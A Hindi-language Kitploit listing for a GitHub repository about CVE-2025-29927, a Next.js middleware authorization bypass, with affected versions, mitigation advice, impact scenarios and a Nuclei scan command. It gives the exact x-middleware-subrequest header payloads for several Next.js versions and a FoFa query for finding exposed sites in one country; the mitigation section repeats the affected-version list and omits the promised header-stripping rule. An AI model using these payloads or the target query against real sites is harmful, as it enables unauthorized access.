Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29927 — CVE-2025-29927: Next.js मिडलवेयर बाईपास भेद्यता | Kitploit
उपकरण/GitHubGitHub/kh4sh3i/cve-2025-29927
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubkh4sh3i/cve-2025-29927

CVE-2025-29927

CVE-2025-29927: Next.js मिडलवेयर बाईपास भेद्यता

रिपॉजिटरी देखें
241 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें



CVE-2025-29927

CVE-2025-29927: Next.js मिडलवेयर बायपास भेद्यता यह रिपॉजिटरी Next.js में CVE-2025-29927 भेद्यता को प्रदर्शित करती है, जहां आंतरिक हेडर x-middleware-subrequest का उपयोग प्रमाणीकरण जैसे मिडलवेयर जांचों को बायपास करने के लिए किया जा सकता है।

प्रभावित संस्करण

root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9

शमन और उपचार

  • Next.js को पैच किए गए संस्करणों में अपग्रेड करें:
root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
  • यदि अपग्रेड तुरंत संभव नहीं है, तो वेब सर्वर या प्रॉक्सी स्तर पर x-middleware-subrequest हेडर को ब्लॉक या स्ट्रिप करें:

प्रभाव परिदृश्य

  • प्राधिकरण बायपास: हमलावर उचित प्रमाणीकरण या प्राधिकरण के बिना संरक्षित मार्गों तक पहुंच सकते हैं।
  • सामग्री सुरक्षा नीति (CSP) बायपास: यदि सीएसपी हेडर मिडलवेयर के माध्यम से जोड़े जाते हैं, तो हमलावर इन सुरक्षा नियंत्रणों को बायपास कर सकते हैं, जिससे क्रॉस-साइट स्क्रिप्टिंग (XSS) हमले संभव हो सकते हैं।
  • कैश-पॉइज़निंग के माध्यम से सेवा से इनकार: कुछ कॉन्फ़िगरेशन में, हमलावर कैश नियंत्रण हेडर सेट करने वाले मिडलवेयर को बायपास करके अनधिकृत सामग्री के साथ कैश को पॉइज़न कर सकते हैं।

nextjs-CVE-2025-29927 Nuclei टेम्पलेट का उपयोग करना

root@kitploit:~
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr

विभिन्न Next.js संस्करणों में शोषण

  • 12.2 से पहले के संस्करणों के लिए:
root@kitploit:~
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
  • 12.2 और बाद के संस्करणों के लिए:
root@kitploit:~
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
  • 13.2.0 और बाद के संस्करणों के लिए:
root@kitploit:~
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

FoFa के साथ लक्ष्य खोजना

root@kitploit:~
header="x-middleware-rewrite" && country="IR"

इसके लिए निःशुल्क CTF

  • CTF
टूल डाउनलोड करें